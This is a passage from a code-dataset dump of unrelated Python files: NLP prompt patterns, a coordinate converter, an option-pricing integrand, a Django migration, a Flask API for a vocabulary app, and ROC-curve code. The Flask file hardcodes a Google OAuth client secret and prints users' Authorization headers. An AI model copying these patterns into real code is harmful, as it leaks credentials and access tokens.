== 9:\n return [3, self.shortenable(passage), 3, ' Question:', self.shortenable(\" \" + question), '? 
Answer:', 3,\n [self.mask], '.'], []\n elif self.pattern_id < 2:\n return [self.shortenable(passage), ' Question:', self.shortenable(\" \" + question), '? Answer:', [self.mask],\n '.'], []\n elif self.pattern_id < 4:\n return [self.shortenable(passage), ' Based on the previous passage,', self.shortenable(\" \" + question),\n '?', [self.mask], '.'], []\n else:\n return ['Based on the following passage ', self.shortenable(\" \" + question), '?', [self.mask], '.',\n self.shortenable(\" \" + passage)], []\n\n def verbalize(self, label) -> List[str]:\n if self.continuous_prompt or self.pattern_id == 0 or self.pattern_id == 2 or self.pattern_id == 4:\n return BoolQPVP.VERBALIZER_A[label]\n else:\n return BoolQPVP.VERBALIZER_B[label]\n\n\nclass MultiRcPVP(PVP):\n VERBALIZER = {\n 0: [\" No\"],\n 1: [\" Yes\"]\n }\n\n @property\n def spell_length(self):\n return self.pattern_id\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n passage = self.remove_final_punc(self.shortenable(example.text_a.rstrip()))\n question = self.remove_final_punc(example.text_b.rstrip())\n answer = example.meta['answer']\n if self.continuous_prompt:\n if self.pattern_id == 1:\n return [passage, '.', 1, ' Question:', \" \" + question, '? Is it', \" \" + answer, '?', [self.mask],\n '.'], []\n elif self.pattern_id == 2:\n return [passage, '.', 1, ' Question:', \" \" + question, '?', 1, \" \" + answer, '?', [self.mask],\n '.'], []\n elif self.pattern_id == 3:\n return [passage, '.', 1, ' Question:', \" \" + question, '?', 1, \" \" + answer, '?', 1, [self.mask],\n '.'], []\n else:\n raise NotImplementedError(self.pattern_id)\n if self.pattern_id == 0:\n return [passage, '. Question:', \" \" + question, '? Is it', \" \" + answer, '?', [self.mask], '.'], []\n if self.pattern_id == 1:\n return [passage, '. Question:', \" \" + question, '? Is the correct answer \"', answer, '\"?', [self.mask],\n '.'], []\n if self.pattern_id == 2:\n return [passage, '. Based on the previous passage,', \" \" + question, '? 
Is \"', answer,\n '\" a correct answer?', [self.mask], '.'], []\n if self.pattern_id == 3:\n return [passage, \" \" + question, '- [', [self.mask], ']', answer], []\n\n def verbalize(self, label) -> List[str]:\n if not self.continuous_prompt and self.pattern_id == 3:\n return [' False'] if label == 0 else [' True']\n return MultiRcPVP.VERBALIZER[label]\n\n\nclass WicPVP(PVP):\n VERBALIZER_A = {\n \"false\": [\" No\"],\n \"true\": [\" Yes\"]\n }\n VERBALIZER_B = {\n \"false\": [\"2\"],\n \"true\": [\"b\"]\n }\n\n @property\n def spell_length(self):\n return self.pattern_id\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n text_a = example.text_a\n text_b = example.text_b\n word = example.meta['word']\n\n if self.continuous_prompt:\n if self.pattern_id == 1:\n return [self.shortenable('\"' + text_a + '\" / \"' + text_b + '\"'), 1, ' Similar sense of \"' + word + '\"?',\n [self.mask], '.'], []\n elif self.pattern_id == 2:\n return [self.shortenable('\"' + text_a + '\" / \"' + text_b + '\"'), 1, ' Similar sense of \"' + word + '\"?',\n 1, [self.mask], '.'], []\n elif self.pattern_id == 3:\n return [1, self.shortenable('\"' + text_a + '\" / \"' + text_b + '\"'), 1,\n ' Similar sense of \"' + word + '\"?', 1, [self.mask], '.'], []\n elif self.pattern_id == 0:\n return [self.shortenable('\"' + text_a + '\" / \"' + text_b + '\"'), ' Similar sense of \"' + word + '\"?',\n [self.mask], '.'], []\n elif self.pattern_id == 1:\n return [self.shortenable(text_a), self.shortenable(\" \" + text_b),\n ' Does' + \" \" + word + ' have the same meaning in both sentences?', [self.mask]], []\n elif self.pattern_id == 2:\n return [word, ' . Sense (1) (a)', self.shortenable(' \"' + text_a + '\"'), ' (', [self.mask], ') \"', text_b,\n '\"'], []\n\n def verbalize(self, label) -> List[str]:\n if not self.continuous_prompt and self.pattern_id == 2:\n return WicPVP.VERBALIZER_B[label]\n return WicPVP.VERBALIZER_A[label]\n\n\nclass AgnewsPVP(PVP):\n VERBALIZER = {\n \"1\": [\"World\"],\n \"2\": [\"Sports\"],\n \"3\": [\"Business\"],\n \"4\": [\"Tech\"]\n }\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n\n text_a = self.shortenable(example.text_a)\n text_b = self.shortenable(example.text_b)\n\n if self.pattern_id == 0:\n return [[self.mask], ':', text_a, text_b], []\n elif self.pattern_id == 1:\n return [[self.mask], 'News:', text_a, text_b], []\n elif self.pattern_id == 2:\n return [text_a, '(', [self.mask], ')', text_b], []\n elif self.pattern_id == 3:\n return [text_a, text_b, '(', [self.mask], ')'], []\n elif self.pattern_id == 4:\n return ['[ Category:', [self.mask], ']', text_a, text_b], []\n elif self.pattern_id == 5:\n return [[self.mask], '-', text_a, text_b], []\n else:\n raise ValueError(\"No pattern implemented for id {}\".format(self.pattern_id))\n\n def verbalize(self, label) -> List[str]:\n return AgnewsPVP.VERBALIZER[label]\n\n\nclass YahooPVP(PVP):\n VERBALIZER = {\n \"1\": [\"Society\"],\n \"2\": [\"Science\"],\n \"3\": [\"Health\"],\n \"4\": [\"Education\"],\n \"5\": [\"Computer\"],\n \"6\": [\"Sports\"],\n \"7\": [\"Business\"],\n \"8\": [\"Entertainment\"],\n \"9\": [\"Relationship\"],\n \"10\": [\"Politics\"],\n }\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n\n text_a = self.shortenable(example.text_a)\n text_b = self.shortenable(example.text_b)\n\n if self.pattern_id == 0:\n return [[self.mask], ':', text_a, text_b], []\n elif self.pattern_id == 1:\n return [[self.mask], 'Question:', text_a, text_b], []\n elif self.pattern_id == 2:\n return 
[text_a, '(', [self.mask], ')', text_b], []\n elif self.pattern_id == 3:\n return [text_a, text_b, '(', [self.mask], ')'], []\n elif self.pattern_id == 4:\n return ['[ Category:', [self.mask], ']', text_a, text_b], []\n elif self.pattern_id == 5:\n return [[self.mask], '-', text_a, text_b], []\n else:\n raise ValueError(\"No pattern implemented for id {}\".format(self.pattern_id))\n\n def verbalize(self, label) -> List[str]:\n return YahooPVP.VERBALIZER[label]\n\n\nclass MnliPVP(PVP):\n VERBALIZER_A = {\n \"contradiction\": [\"Wrong\"],\n \"entailment\": [\"Right\"],\n \"neutral\": [\"Maybe\"]\n }\n VERBALIZER_B = {\n \"contradiction\": [\"No\"],\n \"entailment\": [\"Yes\"],\n \"neutral\": [\"Maybe\"]\n }\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n text_a = self.shortenable(self.remove_final_punc(example.text_a))\n text_b = self.shortenable(example.text_b)\n\n if self.pattern_id == 0 or self.pattern_id == 2:\n return ['\"', text_a, '\" ?'], [[self.mask], ', \"', text_b, '\"']\n elif self.pattern_id == 1 or self.pattern_id == 3:\n return [text_a, '?'], [[self.mask], ',', text_b]\n\n def verbalize(self, label) -> List[str]:\n if self.pattern_id == 0 or self.pattern_id == 1:\n return MnliPVP.VERBALIZER_A[label]\n return MnliPVP.VERBALIZER_B[label]\n\n\nclass YelpPolarityPVP(PVP):\n VERBALIZER = {\n \"1\": [\"bad\"],\n \"2\": [\"good\"]\n }\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n text = self.shortenable(example.text_a)\n\n if self.pattern_id == 0:\n return ['It was', [self.mask], '.', text], []\n elif self.pattern_id == 1:\n return [text, '. All in all, it was', [self.mask], '.'], []\n elif self.pattern_id == 2:\n return ['Just', [self.mask], \"!\"], [text]\n elif self.pattern_id == 3:\n return [text], ['In summary, the restaurant is', [self.mask], '.']\n else:\n raise ValueError(\"No pattern implemented for id {}\".format(self.pattern_id))\n\n def verbalize(self, label) -> List[str]:\n return YelpPolarityPVP.VERBALIZER[label]\n\n\nclass YelpFullPVP(YelpPolarityPVP):\n VERBALIZER = {\n \"1\": [\"terrible\"],\n \"2\": [\"bad\"],\n \"3\": [\"okay\"],\n \"4\": [\"good\"],\n \"5\": [\"great\"]\n }\n\n def verbalize(self, label) -> List[str]:\n return YelpFullPVP.VERBALIZER[label]\n\n\nclass XStancePVP(PVP):\n VERBALIZERS = {\n 'en': {\"FAVOR\": [\"Yes\"], \"AGAINST\": [\"No\"]},\n 'de': {\"FAVOR\": [\"Ja\"], \"AGAINST\": [\"Nein\"]},\n 'fr': {\"FAVOR\": [\"Oui\"], \"AGAINST\": [\"Non\"]}\n }\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n\n text_a = self.shortenable(example.text_a)\n text_b = self.shortenable(example.text_b)\n\n if self.pattern_id == 0 or self.pattern_id == 2 or self.pattern_id == 4:\n return ['\"', text_a, '\"'], [[self.mask], '. 
\"', text_b, '\"']\n elif self.pattern_id == 1 or self.pattern_id == 3 or self.pattern_id == 5:\n return [text_a], [[self.mask], '.', text_b]\n\n def verbalize(self, label) -> List[str]:\n lang = 'de' if self.pattern_id < 2 else 'en' if self.pattern_id < 4 else 'fr'\n return XStancePVP.VERBALIZERS[lang][label]\n\n\ndef get_verbalization_ids(word: str, tokenizer, force_single_token: bool) -> Union[int, List[int]]:\n \"\"\"\n Get the token ids corresponding to a verbalization\n\n :param word: the verbalization\n :param tokenizer: the tokenizer to use\n :param force_single_token: whether it should be enforced that the verbalization corresponds to a single token.\n If set to true, this method returns a single int instead of a list and throws an error if the word\n corresponds to multiple tokens.\n :return: either the list of token ids or the single token id corresponding to this word\n \"\"\"\n ids = tokenizer.EncodeAsIds(word).tokenization\n if not force_single_token:\n return ids\n assert len(ids) == 1, \\\n f'Verbalization \"{word}\" does not correspond to a single token, got {tokenizer.DecodeIds(ids)}'\n verbalization_id = ids[0]\n assert verbalization_id not in tokenizer.command_id_map, \\\n f'Verbalization {word} is mapped to a special token {tokenizer.IdToToken(verbalization_id)}'\n return verbalization_id\n\nclass AtomicPVP(PVP):\n is_multi_token = True\n VERBALIZER = {\n \"oEffect\":[\"The effect on others will be \"],\n \"oReact\":[\"As a result, others feel \"],\n \"oWant\":[\"After, others will want to \"],\n \"xAttr\":[\"PersonX is \"],\n \"xEffect\":[\"The effect on PersonX will be \"],\n \"xIntent\":[\"PersonX did this to \"],\n \"xNeed\":[\"Before, PersonX needs to \"],\n \"xReact\":[\"PersonX will be \"],\n \"xReason\":[\"PersonX did this because \"],\n \"xWant\":[\"After, PersonX will want to \"]\n }\n\n def get_parts(self, example: InputExample) -> FilledPattern:\n # switch text_a and text_b to get the correct order\n text_a = example.text_a\n text_b = example.text_b.rstrip(string.punctuation)\n return ['\"', self.shortenable(text_a), '\";'], [[self.mask], '\"', self.shortenable(text_b), '\"']\n\n def verbalize(self, label) -> List[str]:\n return AtomicPVP.VERBALIZER[label]\n\nPVPS = {\n 'rte': RtePVP,\n 'wic': WicPVP,\n 'cb': CbPVP,\n 'wsc': WscPVP,\n 'boolq': BoolQPVP,\n 'copa': CopaPVP,\n 'multirc': MultiRcPVP,\n 'record': RecordPVP,\n 'ax-b': RtePVP,\n 'ax-g': RtePVP,\n 'atomic': AtomicPVP,\n}\n","sub_path":"tasks/superglue/pvp.py","file_name":"pvp.py","file_ext":"py","file_size_in_byte":39531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"624466881","text":"import numpy\n\ndef cart2sph(z, y, x):\n \"\"\"Convert from cartesian coordinates (x,y,z) to spherical (elevation,\n azimuth, radius). Output is in radians. \n \n usage:\n array3xN[el,az,rad] = cart2sph(array3xN[x,y,z])\n OR\n elevation, azimuth, radius = cart2sph(x,y,z)\n \n If working in DKL space, z = Luminance, y = S and x = LM\"\"\"\n \n elevation = numpy.empty([512,512])\n radius = numpy.empty([512,512])\n azimuth = numpy.empty([512,512])\n \n radius = numpy.sqrt(x**2 + y**2 + z**2)\n azimuth = numpy.arctan2(y, x)\n #Calculating the elevation from x,y up\n elevation = numpy.arctan2(z, numpy.sqrt(x**2+y**2))\n\n#convert azimuth and elevation angles into degrees\n azimuth *=(180.0/numpy.pi)\n elevation *=(180.0/numpy.pi)\n\n sphere = numpy.array([elevation, azimuth, radius])\n sphere = numpy.rollaxis(sphere, 0, 3)\n\n return sphere","sub_path":"Tests/myCart2Sph.py","file_name":"myCart2Sph.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"472624628","text":"\"\"\" Definition for class AsianCall, a concrete implementation of Integrand \"\"\"\n\nfrom ._integrand import Integrand\nfrom .._util import ParameterError\n\nfrom numpy import exp, maximum, log, zeros, array\n\n\nclass AsianCall(Integrand):\n \"\"\" Specify and generate payoff values of an Asian Call option \"\"\"\n\n def __init__(self, bm_measure, volatility=0.5, start_price=30,\n strike_price=25, interest_rate=0, mean_type='arithmetic'):\n \"\"\"\n Initialize AsianCall Integrand's'\n\n Args:\n bm_measure (TrueMeasure): A BrownianMotion Measure object\n volatility (float): sigma, the volatility of the asset\n start_price (float): S(0), the asset value at t=0\n strike_price (float): strike_price, the call/put offer\n interest_rate (float): r, the annual interest rate\n mean_type (string): 'arithmetic' or 'geometric' mean\n \"\"\"\n mean_type = mean_type.lower()\n if mean_type not in ['arithmetic', 'geometric']:\n raise ParameterError(\"mean_type must either 'arithmetic' or 'geometric'\")\n dimension = bm_measure.dimension\n super().__init__(dimension,\n bm_measure=bm_measure,\n dim_frac=array([0] + [dimension[i] / dimension[i - 1] for i in range(1, len(dimension))]),\n volatility=volatility,\n start_price=start_price,\n strike_price=strike_price,\n interest_rate=interest_rate,\n mean_type=[mean_type],\n exercise_time=[bm_measure[i].time_vector[-1] for i in range(len(dimension))])\n\n def g(self, x):\n \"\"\"\n Original integrand to be integrated\n\n Args:\n x: nodes, :math:`\\\\boldsymbol{x}_{\\\\mathfrak{u},i} = i^{\\\\mathtt{th}}` \\\n row of an :math:`n \\\\cdot |\\\\mathfrak{u}|` matrix\n\n Returns:\n :math:`n \\\\cdot p` matrix with values \\\n :math:`f(\\\\boldsymbol{x}_{\\\\mathfrak{u},i},\\\\mathbf{c})` where if \\\n :math:`\\\\boldsymbol{x}_i' = (x_{i, \\\\mathfrak{u}},\\\\mathbf{c})_j`, \\\n then :math:`x'_{ij} = x_{ij}` for :math:`j \\\\in \\\\mathfrak{u}`, \\\n and :math:`x'_{ij} = c` otherwise\n \"\"\"\n s_fine = self.start_price * exp(\n (self.interest_rate - self.volatility ** 2 / 2) *\n self.bm_measure.time_vector + self.volatility * x)\n y = self.get_discounted_payoffs(s_fine, self.dimension)\n if self.dim_frac > 0:\n s_course = s_fine[:, int(self.dim_frac - 1):: int(self.dim_frac)]\n d_course = self.dimension / self.dim_frac\n y_course = self.get_discounted_payoffs(s_course, d_course)\n y -= y_course\n return y\n\n def get_discounted_payoffs(self, stock_path, dimension):\n \"\"\"\n Calculate the discounted payoff from the stock path\n\n stock_path (ndarray): option prices at monitoring times\n dimension (int): number of dimensions\n \"\"\"\n if self.mean_type == 'arithmetic':\n avg = (self.start_price / 2 +\n stock_path[:, :-1].sum(1) +\n stock_path[:, -1] / 2) / \\\n dimension\n elif self.mean_type == 'geometric':\n avg = exp((log(self.start_price) / 2 +\n log(stock_path[:, :-1]).sum(1) +\n log(stock_path[:, -1]) / 2) /\n dimension)\n y = maximum(avg - self.strike_price, 0) * exp(-self.interest_rate * self.exercise_time)\n return y\n\n def __repr__(self, attributes=[]):\n \"\"\"\n Print important attribute values\n\n Args: \n attributes (list): list of attributes to print\n\n Returns:\n string of self info\n \"\"\"\n attributes = ['volatility', 'start_price', 'strike_price', 'interest_rate', 'mean_type', 'exercise_time']\n return 
super().__repr__(attributes)\n","sub_path":"python_prototype/qmcpy/integrand/asian_call.py","file_name":"asian_call.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"410529030","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [(\"posters\", \"0003_ordermixin_comment\")]\n\n operations = [\n migrations.AlterField(\n model_name=\"ordermixin\",\n name=\"comments\",\n field=models.TextField(null=True, verbose_name=\"kommentar\", blank=True),\n )\n ]\n","sub_path":"apps/posters/migrations/0004_auto_20151119_1236.py","file_name":"0004_auto_20151119_1236.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"436947383","text":"from flask_restful import Resource, reqparse, marshal_with, marshal, fields, abort, inputs\nfrom flask import request, redirect, jsonify\nimport requests\nfrom . import api\nfrom .models import User, Word, List, ListsWords, Fillword\nfrom . import db\nimport json\n\n\nGOOGLE_CLIENT_ID = \"632277419807-7k3fohav6n5dtrbhdrrga12vipr22qi5.apps.googleusercontent.com\"\nGOOGLE_CLIENT_SECRET = \"gb-xu0MzAu4dFr8dAkJCc-hk\"\nGOOGLE_DISCOVERY_URL = (\n \"https://accounts.google.com/.well-known/openid-configuration\"\n)\n\n\n# TEST DATA\nwords_json = [\n {\n \"id\": 0,\n \"word_name\": \"Word0\",\n \"word_type\": \"noun\"\n }\n]\n\nlists_json = [\n {\n \"id\": 0,\n \"name\": \"List0\"\n },\n {\n \"id\": 1,\n \"name\": \"List1\"\n }\n]\n\n\n# FIELDS\nuser_fields = {\n \"id\": fields.Integer,\n \"email\": fields.String\n}\n\nwords_fields = {\n \"id\": fields.Integer,\n \"name\": fields.String(attribute=\"word_name\"),\n \"type\": fields.Integer(attribute=\"word_type\"),\n \"definitions\": fields.String(attribute=\"definitions\"),\n \"examples\": fields.String(attribute=\"examples\")\n}\n\nwords_ids_fields = {\n \"id\": fields.Integer\n}\n\nlists_fields = {\n \"id\": fields.Integer,\n \"name\": fields.String\n}\n\nlists_with_words_ids_fields = {\n \"id\": fields.Integer,\n \"name\": fields.String,\n \"words\": fields.List(fields.Nested(words_ids_fields))\n}\n\nlists_words_fields = {\n \"id\": fields.Integer,\n \"name\": fields.String,\n \"words\": fields.List(fields.Nested(words_fields))\n}\n\n\n# GOOGLE\ndef getGoogleUser():\n auth = request.headers.get(\"Authorization\")\n print(auth)\n res = requests.get(\"https://openidconnect.googleapis.com/v1/userinfo\", headers={\"Authorization\": auth})\n\n print(res.json())\n\n if res.status_code == 401:\n return abort(401)\n\n return res\n\ndef getUserWithEmail():\n res = getGoogleUser()\n\n if res:\n email = res.json()[\"email\"]\n return User.query.filter_by(email=email).first(), email\n else:\n return res, None\n\ndef getUser():\n user, email = getUserWithEmail()\n return user\n\ndef get_google_provider_cfg():\n return requests.get(GOOGLE_DISCOVERY_URL).json()\n\n\n# LISTS\nclass ListWords(Resource):\n def get(self, list_id):\n user = getUser()\n\n if user:\n parser = reqparse.RequestParser()\n parser.add_argument(\"type\", type=str)\n info_type = parser.parse_args()[\"type\"]\n\n words = user.lists.filter_by(id=list_id).first().words.all()\n if not info_type or info_type == \"full\":\n return marshal(words, words_fields)\n elif info_type == \"id\":\n return marshal(words, words_ids_fields)\n else:\n return abort(401)\n\n return abort(404)\n\n def post(self, list_id):\n user = getUser()\n if user:\n parser = reqparse.RequestParser()\n parser.add_argument(\"wordId\", type=int)\n \n word_id = parser.parse_args()[\"wordId\"]\n\n if list_id and word_id:\n listObj = user.lists.filter_by(id=list_id).first()\n \n if not listObj.words.filter_by(id=word_id).first():\n word = user.words.filter_by(id=word_id).first()\n listObj.words.append(word)\n db.session.commit()\n else:\n return abort(403)\n\n return marshal(listObj, lists_with_words_ids_fields)\n\n return abort(404)\n\n\nclass ListValidation:\n @staticmethod\n def validate_name(value):\n if len(value) < 2:\n raise ValueError(\"List's length can't be less then 2 symbols\")\n\n return value\n\nclass Lists(Resource):\n def get(self):\n user = getUser()\n\n if user:\n lists = user.lists.all()\n\n parser = reqparse.RequestParser()\n parser.add_argument(\"with_words_id\", type=str)\n 
with_words_id = parser.parse_args()[\"with_words_id\"]\n\n            if with_words_id == \"true\":\n                return marshal(lists, lists_with_words_ids_fields)\n\n            return marshal(lists, lists_fields)\n        else:\n            return abort(401)\n    \n    def post(self):\n        user = getUser()\n\n        if user:\n            parser = reqparse.RequestParser()\n            parser.add_argument(\"name\", type=ListValidation.validate_name)\n\n            name = parser.parse_args()[\"name\"]\n            listObj = List(name=name)\n            db.session.add(listObj)\n            user.lists.append(listObj)\n            db.session.commit()\n\n            return marshal(listObj, lists_fields), 201\n        \n        return abort(404)\n\n    def put(self):\n        user = getUser()\n\n        if user:\n            parser = reqparse.RequestParser()\n            parser.add_argument(\"id\", type=int)\n            parser.add_argument(\"name\", type=ListValidation.validate_name)\n            parser.add_argument(\"words\", type=str)\n\n            list_id = parser.parse_args()[\"id\"]\n            name = parser.parse_args()[\"name\"]\n            words = parser.parse_args()[\"words\"]\n\n            listObj = user.lists.filter_by(id=list_id).first()\n            if listObj:\n                listObj.name = name\n\n                if words:\n                    for word in words.split(\",\"):\n                        word_from_list = listObj.words.filter_by(id=word).first()\n                        listObj.words.remove(word_from_list)\n\n                db.session.commit()\n                return marshal(listObj, lists_with_words_ids_fields), 200\n        \n        return abort(404)\n    \n    def delete(self):\n        user = getUser()\n\n        if user:\n            parser = reqparse.RequestParser()\n            parser.add_argument(\"listId\", type=int)\n\n            list_id = parser.parse_args()[\"listId\"]\n            print(user.lists.all())\n            listObj = user.lists.filter_by(id=list_id).first()\n            user.lists.remove(listObj)\n            \n            db.session.delete(listObj)\n            db.session.commit()\n            return '', 204\n        \n        return abort(404)\n\n\n# WORDS\nclass WordValidation:\n    @staticmethod\n    def validate_type(value):\n        value = int(value)\n        if value < 0 or value > 8:\n            raise ValueError(\"Must be a number in the range [0;8]\")\n        return value\n\n    @staticmethod\n    def validate_word_name(value):\n        if type(value) is not str:\n            raise ValueError(\"Just checking\")\n        if len(value) < 2:\n            raise ValueError(\"Word's length can't be less than 2 symbols\")\n        return value\n\nclass Words(Resource):\n    @marshal_with(words_fields)\n    def get(self):\n        user, email = getUserWithEmail()\n\n        if user:\n            words = user.words.all()\n            return words\n        else:\n            return abort(404, message=f\"No user with email - {email}\")\n\n    def put(self):\n        parser = reqparse.RequestParser(bundle_errors=True)\n        parser.add_argument(\"id\", type=int)\n        parser.add_argument(\"word\", type=WordValidation.validate_word_name)\n        parser.add_argument(\"type\", type=WordValidation.validate_type)\n        parser.add_argument(\"defs\", type=str)\n        parser.add_argument(\"examples\", type=str)\n\n        word_id = parser.parse_args()[\"id\"]\n        word_name = parser.parse_args()[\"word\"]\n        word_type = parser.parse_args()[\"type\"]\n        defs = parser.parse_args()[\"defs\"]\n        examples = parser.parse_args()[\"examples\"]\n        \n        user = getUser()\n        if user:\n            word = user.words.filter_by(id=word_id).first()\n            if word:\n                word.word_name = word_name\n                word.word_type = word_type\n                word.definitions = 
defs\n                word.examples = examples\n                db.session.commit()\n                \n                return marshal(word, words_fields), 200\n\n        return abort(404, message=f\"No word with id - {word_id}\")\n\n    def post(self):\n        parser = reqparse.RequestParser(bundle_errors=True)\n        parser.add_argument(\"word\", type=WordValidation.validate_word_name)\n        parser.add_argument(\"type\", type=WordValidation.validate_type)\n        parser.add_argument(\"defs\", type=str)\n        parser.add_argument(\"examples\", type=str)\n\n        word_name = parser.parse_args()[\"word\"]\n        word_type = parser.parse_args()[\"type\"]\n        defs = parser.parse_args()[\"defs\"]\n        examples = parser.parse_args()[\"examples\"]\n\n        user = getUser()\n        if user:\n            word = Word(word_name=word_name, word_type=word_type, definitions=defs, examples=examples, user=user)\n            db.session.add(word)\n            db.session.commit()\n\n            return marshal(word, words_fields), 201\n\n        return abort(400, message=\"Server error\")\n    \n    def delete(self):\n        user = getUser()\n        if user:\n            parser = reqparse.RequestParser()\n            parser.add_argument(\"wordId\", type=str)\n\n            wordId = parser.parse_args()[\"wordId\"]\n\n            if wordId:\n                word = user.words.filter_by(id=wordId)\n                word.delete()\n\n            db.session.commit()\n            return '', 204\n\n        return abort(404, message=\"User not found\")\n\n# DELETE\nclass Test(Resource):\n    # @marshal_with(user_fields)\n    def get(self):\n        user = getUser()\n        if user:\n            print(\"TES\")\n\n        return \"This is a test\"\n\nclass Login(Resource):\n    # def get(self):\n    #     google_provider_cfg = get_google_provider_cfg()\n    #     authorization_endpoint = google_provider_cfg[\"authorization_endpoint\"]\n\n    #     url = authorization_endpoint + \"?response_type=code&client_id=632277419807-7k3fohav6n5dtrbhdrrga12vipr22qi5.apps.googleusercontent.com&redirect_uri=https%3A%2F%2F127.0.0.1%3A5000%2Flogin%2Fcallback&scope=openid+email+profile&&access_type=offline\"\n\n    #     return redirect(url)\n    def get(self):\n        res = getUser()\n        if res is None:\n            return abort(404, message=\"\")\n        elif res:\n            return marshal(res, profile_fields), 200\n        elif res.status_code == 401:\n            return abort(401, message=\"\")\n        else:\n            return abort(400, message=\"\")\n\n    def post(self):\n        googleUser = getGoogleUser()\n\n        if googleUser:\n            email = googleUser.json()[\"email\"]\n            existing_user = User.query.filter_by(email=email).first()\n\n            if existing_user is None:\n                given_name = googleUser.json()[\"given_name\"]\n                family_name = googleUser.json()[\"family_name\"]\n                picture = googleUser.json()[\"picture\"]\n                \n                user = User(email=email, family_name=family_name, given_name=given_name, picture=picture)\n                db.session.add(user)\n                db.session.commit()\n            else:\n                # reuse the existing account; user was previously unbound on this path\n                user = existing_user\n\n            return marshal(user, profile_fields), 200\n            # return f\"User {email} was created\"\n\n        return abort(400, message=\"Could not fetch the Google user\")\n\n\nclass LoginCallback(Resource):\n    def get(self):\n        parser = reqparse.RequestParser()\n        parser.add_argument(\"code\", type=str, help=\"{error_msg}\")\n        print(parser.parse_args())\n\n        # requests.get()\n        return parser.parse_args()[\"code\"]\n\ntypes = [\n    \"\",\n    \"noun\",\n    \"verb\"\n]\n\nclass Types(Resource):\n    def get(self):\n        return types\n\nfillwords_fields = {\n    \"id\": fields.Integer,\n    \"name\": fields.String,\n    \"topic\": fields.String,\n    \"access\": fields.Integer,\n    \"data\": fields.String\n}\n\nuser_info_fields = {\n    \"id\": fields.Integer,\n    \"family_name\": fields.String,\n    \"given_name\": fields.String\n}\n\nprofile_fields = {\n    \"given_name\": fields.String,\n    \"family_name\": fields.String,\n    \"picture\": fields.String,\n    \"email\": fields.String 
\n}\n\nfillwords_with_author_fields = {\n    \"id\": fields.Integer,\n    \"name\": fields.String,\n    \"topic\": fields.String,\n    \"access\": fields.Integer,\n    \"data\": fields.String,\n    \"author\": fields.Nested(user_info_fields)\n}\n\nfillwords_json = [\n    {\n        \"id\": 1,\n        \"name\": \"fillword1\",\n        \"topic\": \"unsorted\",\n        \"access\": 1,\n        \"data\": \"no data\"\n    },\n    {\n        \"id\": 2,\n        \"name\": \"fillword2\",\n        \"topic\": \"unsorted\",\n        \"access\": 1,\n        \"data\": \"no data\"\n    }\n]\n\nclass Fillwords(Resource):\n    @marshal_with(fillwords_with_author_fields)\n    def get(self):\n        fillwords = Fillword.query.all()\n        for fillword in fillwords:\n            fillword.author = fillword.users.first()\n\n        return fillwords\n\n    @marshal_with(fillwords_fields)\n    def post(self):\n        user = getUser()\n        if user:\n            parser = reqparse.RequestParser()\n\n            parser.add_argument(\"name\")\n            parser.add_argument(\"topic\")\n            parser.add_argument(\"data\")\n\n            name = parser.parse_args()[\"name\"]\n            topic = parser.parse_args()[\"topic\"]\n            data = parser.parse_args()[\"data\"]\n\n            fillword = Fillword(name=name, topic=topic, data=data)\n            fillword.users.append(user)\n\n            db.session.add(fillword)\n            db.session.commit()\n\n            fillword.author = user\n\n            return marshal(fillword, fillwords_with_author_fields), 201\n\n        return abort(404)\n\n# ENDPOINTS\napi.add_resource(Test, \"/test\")\napi.add_resource(Types, \"/types\")\n\napi.add_resource(Lists, \"/lists\")\napi.add_resource(ListWords, \"/lists/<int:list_id>/words\")\n\napi.add_resource(Words, \"/words\")\napi.add_resource(Fillwords, \"/fillwords\")\n\napi.add_resource(Login, \"/login\")\napi.add_resource(LoginCallback, \"/login/callback\")","sub_path":"easylearnApp/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":14165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"243755604","text":"import numpy as np\nimport pandas as pd\nfrom pandas.plotting import scatter_matrix\nfrom sklearn.linear_model import LinearRegression, Ridge, Lasso\nfrom sklearn.preprocessing import StandardScaler\nimport matplotlib.pyplot as plt\nimport math\nfrom utils import XyScaler\nfrom linear import rmse\nfrom tabulate import tabulate\nfrom linear import linear_modeling_test\nimport statsmodels.api as sm\nimport seaborn as sns\n\ndef roc_curve(predictions, labels, thresholds):\n Recall = []\n FPR = []\n Precision = []\n Accuracy = []\n Spec = []\n\n for score in thresholds:\n pred_int = (predictions > score).astype(int)\n labels_bin = (labels > 0).astype(int)\n tp = ((pred_int == 1) & (labels_bin == 1)).sum()\n fn = ((pred_int == 0) & (labels_bin == 1)).sum()\n fp = ((pred_int == 1) & (labels_bin == 0)).sum()\n tn = ((pred_int == 0) & (labels_bin == 0)).sum()\n tpr = tp/(fn + tp)\n fpr = fp/(tn + fp)\n pre = tp/(fp + tp)\n specificity = tn/(tn+fp)\n acc = (tp + tn)/(tp + tn + fp + fn)\n FPR.append(fpr)\n Recall.append(tpr)\n Precision.append(pre)\n Accuracy.append(acc)\n Spec.append(specificity)\n return np.array(Precision), np.array(Recall), np.array(Accuracy), np.array(Spec), np.array(FPR)\n\ndef roc_graph(y_hat,y, thresholds, name):\n prec, rec, acc, spec, fpr = roc_curve(y_hat, y, thresholds)\n fig, ax = plt.subplots()\n ax.plot(fpr, rec)\n ax.plot(ax.get_xlim(), ax.get_ylim(), ls=\"--\", c=\".3\")\n ax.set_xlabel(\"False Positive Rate (1 - Specificity)\")\n ax.set_ylabel(\"True Positive Rate (Sensitivity, Recall)\")\n ax.set_title(\"ROC plot of {}\".format(name))\n plt.savefig(\"images/ROC of 